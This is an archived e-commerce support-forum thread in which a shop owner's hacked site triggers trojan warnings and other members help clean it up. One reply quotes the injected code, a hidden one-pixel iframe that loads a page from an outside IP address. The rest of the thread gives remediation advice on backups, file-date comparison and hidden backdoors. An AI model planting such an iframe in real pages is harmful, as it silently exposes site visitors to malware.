Jump to content

Archived

This topic is now archived and is closed to further replies.

sjnewbie

Could you check it out for me please?

Recommended Posts

Hi Guys,

 

I've got customers who said Trojan/Virus Alert automatically came up when they browsed my website. Some customers said my 'Contact Us' bounced back when they filled in the enquiry.

 

Can any of you guys check this out for me?

 

I've got my website hacked a while ago and have implimented most security stuff that I could manage to do myself. I thought that was enough cos I didn't notice any problem on my end.

 

My website is on here.

 

Thanks for your time and advice in advance!

Share this post


Link to post
Share on other sites

In the source code of the index page:

 

<iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>

I'd say you're still in a "state of hack". :'(


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Oh dear, any particular advice? Do you reckon I've missed out a few things last time I tried to sort it or is that the new hacking?

 

Spent so much time on that and can't believe I had to go through again! I don't even remember what I've done last time except it involved a coupe of all nighters.

 

Any suggestion as to where to start please? :sweating:

Share this post


Link to post
Share on other sites

Oh dear, any particular advice? Do you reckon I've missed out a few things last time I tried to sort it or is that the new hacking?

 

Spent so much time on that and can't believe I had to go through again! I don't even remember what I've done last time except it involved a coupe of all nighters.

 

Any suggestion as to where to start please? :sweating:

How to Secure Your Site


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Remember hackers often leave hidden files/back doors etc so even if you remove the obvious & close the hole they used first, they can still get back in.

 

Your best bet after any hack is to get host to wipe site & restore with your clean backup, then add security b4 going back live.

 

 

If you have no clean backups you may have to resort to going back to your original files.

 

 

Unfortunatly too many ignore the rule ALWAYS KEEP BACKUPs, and regret that only when its too late.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Thanks! I've gone through most in that thread last time.

 

I've done the search and learnt that I need to remove the line you picked up from all my php files. Is there an easier way of spotting them throughout all my files or going through each php file one by one is the only option?

Share this post


Link to post
Share on other sites

I see.. I've done the regular back up but the thing is I don't know how far I need to go back. Don't know exactly when the website was hacked so which back up I have is a clean one to use.

 

Starting from scratch is just not imaginable. Did learn and implimented many contributions. Can't even remember how to do them again so have to learn them all over again. Time is not in my favour at the moment :(

Share this post


Link to post
Share on other sites

I just feel it would be much faster to try and get rid of files. Is it impossible to spot hidden files/back doors?

 

 

Possibly the easyest way to spot hacked files is with ftp, use that to compare last changed date on your local files with the server version, if there is a varience then examine the suspect file.

 

 

If you read through the thread on the base64 attack, that refers to a util to search your files for a paticular bit of code.

 

 

But remember my warning on hidden files/folders or even some you won't be able to delete!!


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Okay thank you very much!

 

I will focus on the obvious ones for now - one at a time. Hopefully, will spend time and make over at some point. Just hate to think it may affect my customers in any negative way - their email, ID and password being mis-used or such. Hope this is not the case.

 

Would you be able to confirm that there is no more Trojan/Virus Pop up Warning since I removed the code when you browse the website?

Share this post


Link to post
Share on other sites

Would you be able to confirm that there is no more Trojan/Virus Pop up Warning since I removed the code when you browse the website?

 

 

Rather than ask ask others to risk infection with your virus, you should check that your self.

 

backup your site with Backup of all store files in zip format http://addons.oscommerce.com/info/6986 or similar, then scan the uploaded file, if your pc AV software aint up to it, use one of the many online services.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

I was actually concerned about risking others but assumed they would have a necessary software to block it :blush:

 

Thanks again for all your help. Much appreciated! :thumbsup:

Share this post


Link to post
Share on other sites

×